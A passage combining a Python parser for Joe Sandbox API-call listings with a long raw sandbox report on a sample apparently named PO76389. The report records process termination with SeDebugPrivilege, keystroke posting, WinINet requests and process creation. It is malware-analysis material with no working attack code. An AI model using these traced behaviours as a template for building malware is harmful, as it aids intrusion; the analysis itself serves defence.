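    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Metadata bullets such as "• Instruction ID: ..." or "• API String ID: ...".
KV_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

# dwOption indices for Internet{Set,Query}OptionW (assumed subset, values from wininet.h).
INTERNET_OPTION = {
    0x02: "INTERNET_OPTION_CONNECT_TIMEOUT",
    0x05: "INTERNET_OPTION_SEND_TIMEOUT",
    0x06: "INTERNET_OPTION_RECEIVE_TIMEOUT",
    0x1F: "INTERNET_OPTION_SECURITY_FLAGS",
    0x29: "INTERNET_OPTION_USER_AGENT",
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str                              # address of the call site
    subcall_of: Optional[str] = None      # callee address when the call is indirect

@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def direct_apis(self):
        """APIs the function itself calls, in listing order (subcalls excluded)."""
        return [c.api for c in self.calls if c.subcall_of is None]

def parse_listing(text):
    """Split the listing at each 'APIs' heading and collect calls and metadata per record."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
            continue
        m = KV_LINE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"]
    return records

def callers_of(records, api_name):
    """(Instruction ID, call-site address) for every function calling api_name directly."""
    return [(r.meta.get("Instruction ID"), c.ref)
            for r in records for c in r.calls
            if c.api == api_name and c.subcall_of is None]

def wininet_options(record):
    """Name the dwOption argument of Internet{Set,Query}OptionW calls in one record.
    Only the option index is decoded; lpBuffer is a pointer, so flag bits stay unknown."""
    found = []
    for c in record.calls:
        if c.api in ("InternetSetOptionW", "InternetQueryOptionW") and len(c.args) >= 2:
            try:
                opt = int(c.args[1], 16)
            except ValueError:            # '?' means the sandbox could not resolve it
                continue
            found.append((c.api, INTERNET_OPTION.get(opt, "0x%X" % opt)))
    return found

# Constructed input: two records copied from the listing on this page.
SAMPLE = """APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00504C5E
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00504C8A
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00504CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00504CE1
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504CEE
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00504D1E
• InternetCloseHandle.WININET(00000000), ref: 00504D65
  • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• API String ID: 1241431887-3916222277
• Instruction ID: cd456a6d29502bfeca12e4c47583f02712e3c9e25360fafe0e85f1c624227d45
APIs
• _memset.LIBCMT ref: 005123E6
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00512579
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00512760
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00512792
• CloseHandle.KERNEL32(?), ref: 005127C1
• Instruction ID: 8c318a87831f32e1d325cadeda7246de76d82e9010003c3b1d1d8f93e7715047
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for r in recs:
        print(r.meta.get("Instruction ID", "?")[:16], r.direct_apis())
    print(callers_of(recs, "CreateProcessW"))
    print(wininet_options(recs[0]))
```

Feeding the whole exported listing to parse_listing gives one record per function; callers_of then answers questions such as "which functions reach CreateProcessW or InternetSetOptionW", and the Instruction ID ties each hit back to the report entry.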
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0054DBF0), ref: 0050BBA1
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0054DBF0), ref: 0050BBD5
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0050BD33
                                                    • SysFreeString.OLEAUT32(?), ref: 0050BD5D
                                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 0050BEAD
                                                    • ProgIDFromCLSID.COMBASE(?,?), ref: 0050BEF7
                                                    • CoTaskMemFree.COMBASE(?), ref: 0050BF14
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                    • String ID:
                                                    • API String ID: 793797124-0
                                                    • Opcode ID: f461a9240f4d321e76b7ba47d9ae7c8dd7759e9e4eea1dab05625c658a0da2ff
                                                    • Instruction ID: ec8af44cef09646718aa249e90420fb4690d9c5e92f184c09d649be6ab9121e9
                                                    • Opcode Fuzzy Hash: f461a9240f4d321e76b7ba47d9ae7c8dd7759e9e4eea1dab05625c658a0da2ff
                                                    • Instruction Fuzzy Hash: D8F10A75A00109EFDF14DFA4C884EAEBBB9FF89314F148459F905AB290DB71AE45CB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 005123E6
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00512579
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051259D
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125DD
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125FF
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00512760
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00512792
                                                    • CloseHandle.KERNEL32(?), ref: 005127C1
                                                    • CloseHandle.KERNEL32(?), ref: 00512838
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 879d1ba8f162d7af08ddc69089b72631cbdddf7cdf7ca8fdb7d5fdf6f095cb97
                                                    • Instruction ID: 8c318a87831f32e1d325cadeda7246de76d82e9010003c3b1d1d8f93e7715047
                                                    • Opcode Fuzzy Hash: 879d1ba8f162d7af08ddc69089b72631cbdddf7cdf7ca8fdb7d5fdf6f095cb97
                                                    • Instruction Fuzzy Hash: 66D1C0316043019FDB14EF25C891BAABBE5BF84314F14845EF8899B3A2DB74DC81CB66
                                                    APIs
                                                      • Part of subcall function 004B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004B4954,00000000), ref: 004B4A23
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004CB85B), ref: 004CB926
                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,004CB85B,00000000,?,?,004CAF1E,?,?), ref: 004CB9BD
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0052E775
                                                    • DeleteObject.GDI32(00000000), ref: 0052E7EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 2402799130-0
                                                    • Opcode ID: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                    • Instruction ID: d4bc06c2d4a2a3d0343bac10733a35e481fb55506950eedb204b6823dfe9ab72
                                                    • Opcode Fuzzy Hash: 2806a548d177e263b41412a93895b7c1a89c6533f3120f1de2d456711f07c627
                                                    • Instruction Fuzzy Hash: 4C61E134100B11CFDB259F19E88AB26BBF1FF65311F14011EE19A466B0C734A885EF9A
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0051B204
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 6b9b93a03c4321cdd9657ab9b2e4dae3baa56b0ef6eabc1bc42f9506efa901ca
                                                    • Instruction ID: 2d77ae3dbfdecebd70d191f548a5fa879f5dd9d46963d108a75b6b536ef898d7
                                                    • Opcode Fuzzy Hash: 6b9b93a03c4321cdd9657ab9b2e4dae3baa56b0ef6eabc1bc42f9506efa901ca
                                                    • Instruction Fuzzy Hash: 5F51AD34640204BEFF209B28CC8AFDE3F65BB16314F204916FA65D61A1C7B1E9D4EB51
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0052E9EA
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0052EA0B
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0052EA20
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0052EA3D
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0052EA64
                                                    • DestroyCursor.USER32(00000000), ref: 0052EA6F
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0052EA8C
                                                    • DestroyCursor.USER32(00000000), ref: 0052EA97
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                    • String ID:
                                                    • API String ID: 3992029641-0
                                                    • Opcode ID: 141a72414de109426006647f36afd8d508a2881d5a4eea3eebd2860b0df124b1
                                                    • Instruction ID: 31a6346ee46e48a8bf7c8d901fc91673a603b145577123c2c52dcd3ba96c3ac3
                                                    • Opcode Fuzzy Hash: 141a72414de109426006647f36afd8d508a2881d5a4eea3eebd2860b0df124b1
                                                    • Instruction Fuzzy Hash: AE519A74600208AFDB20CF69DC86FAA3BB4BF19358F10461EF946972D0D774EC91AB55
                                                    APIs
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF737
                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF77E
                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EB55
                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EBC1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    APIs
                                                      • Part of subcall function 004EE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 004EE158
                                                      • Part of subcall function 004EE138: GetCurrentThreadId.KERNEL32 ref: 004EE15F
                                                      • Part of subcall function 004EE138: AttachThreadInput.USER32(00000000,?,004ECDFB,?,00000001), ref: 004EE166
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE06
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004ECE23
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004ECE26
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE2F
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004ECE4D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE50
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE59
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004ECE70
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE73
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00511B09
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00511B17
                                                    • __wsplitpath.LIBCMT ref: 00511B45
                                                      • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                    • _wcscat.LIBCMT ref: 00511B5A
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00511BD0
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00511BE2
                                                    Strings
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID: hEV
                                                    • API String ID: 1380811348-3062041611
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00519926
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 0051993A
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00519954
                                                    • _wcscat.LIBCMT ref: 005199AF
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 005199C6
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005199F4
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    APIs
                                                      • Part of subcall function 004F6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                      • Part of subcall function 004F6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                      • Part of subcall function 004F6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051168B
                                                    • GetLastError.KERNEL32 ref: 0051169E
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005116CA
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00511746
                                                    • GetLastError.KERNEL32(00000000), ref: 00511751
                                                    • CloseHandle.KERNEL32(00000000), ref: 00511786
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 004F62D6
                                                    Strings
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 004F7595
                                                    • LoadStringW.USER32(00000000), ref: 004F759C
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004F75B2
                                                    • LoadStringW.USER32(00000000), ref: 004F75B9
                                                    • _wprintf.LIBCMT ref: 004F75DF
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F75FD
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 004F75DA
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512AE7
                                                    Similarity
                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3479070676-0
                                                    APIs
                                                    • select.WS2_32 ref: 00509B38
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509B45
                                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00509B6F
                                                    • WSAGetLastError.WS2_32(00000000), ref: 00509B9F
                                                    • htons.WS2_32(?), ref: 00509C51
                                                    • inet_ntoa.WS2_32(?), ref: 00509C0C
                                                      • Part of subcall function 004EE0F5: _strlen.LIBCMT ref: 004EE0FF
                                                      • Part of subcall function 004EE0F5: _memmove.LIBCMT ref: 004EE121
                                                    • _strlen.LIBCMT ref: 00509CA7
                                                    • _memmove.LIBCMT ref: 00509D10
                                                    Similarity
                                                    • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                    • String ID:
                                                    • API String ID: 3637404534-0
                                                    APIs
                                                    • __mtinitlocknum.LIBCMT ref: 004DB744
                                                      • Part of subcall function 004D8A0C: __FF_MSGBANNER.LIBCMT ref: 004D8A21
                                                      • Part of subcall function 004D8A0C: __NMSG_WRITE.LIBCMT ref: 004D8A28
                                                      • Part of subcall function 004D8A0C: __malloc_crt.LIBCMT ref: 004D8A48
                                                    • __lock.LIBCMT ref: 004DB757
                                                    • __lock.LIBCMT ref: 004DB7A3
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00566948,00000018,004E6C2B,?,00000000,00000109), ref: 004DB7BF
                                                    • RtlEnterCriticalSection.NTDLL(8000000C), ref: 004DB7DC
                                                    • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 004DB7EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1422805418-0
                                                    • Opcode ID: 4b7d8d7a3e2c1c9766dd025b09fe6d55d910ae35311fa1ea9302ab93cb361fd9
                                                    • Instruction ID: 41dd022488ceffe05175b7e54df20c1849f86023545bcc0c741709fc003914b3
                                                    • Opcode Fuzzy Hash: 4b7d8d7a3e2c1c9766dd025b09fe6d55d910ae35311fa1ea9302ab93cb361fd9
                                                    • Instruction Fuzzy Hash: 43413371E00205CBEB10AF69E864369B7B4EF01329F12821FF428AB3D1D77898459BD9
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004FA1CE
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004FA205
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 004FA221
                                                    • _memmove.LIBCMT ref: 004FA26F
                                                    • _memmove.LIBCMT ref: 004FA28C
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004FA29B
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004FA2B0
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004FA2CF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: b263d2bbf12c627007550704262e8f0f5c5ab020a111ecbe9eec69fd1ca08a18
                                                    • Instruction ID: 543d731446a1a0d36cd4473124dc78a0309cba1f023c6026ab1687dbd3ba68dd
                                                    • Opcode Fuzzy Hash: b263d2bbf12c627007550704262e8f0f5c5ab020a111ecbe9eec69fd1ca08a18
                                                    • Instruction Fuzzy Hash: 9F31CE31A00105EBCB00DF95DC85AAFBBB8EF44310F1040AAF904AB346C775D918DBA5
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00518CF3
                                                    • GetDC.USER32(00000000), ref: 00518CFB
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00518D06
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00518D12
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00518D4E
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00518D5F
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0051BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00518D99
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00518DB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                    • Instruction ID: ba1bc707c7fe2d0811eb37a07fdfcd6aa0839609be4e19580226d2b71cd5353d
                                                    • Opcode Fuzzy Hash: 8413626accba0e0329dffb5c8f68ccb2e6b40814420a69688708930a22fc81be
                                                    • Instruction Fuzzy Hash: 4D316B72200614BBEB208F50EC8AFEA3FB9EF59755F084055FE089A291DA759841DBB0
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
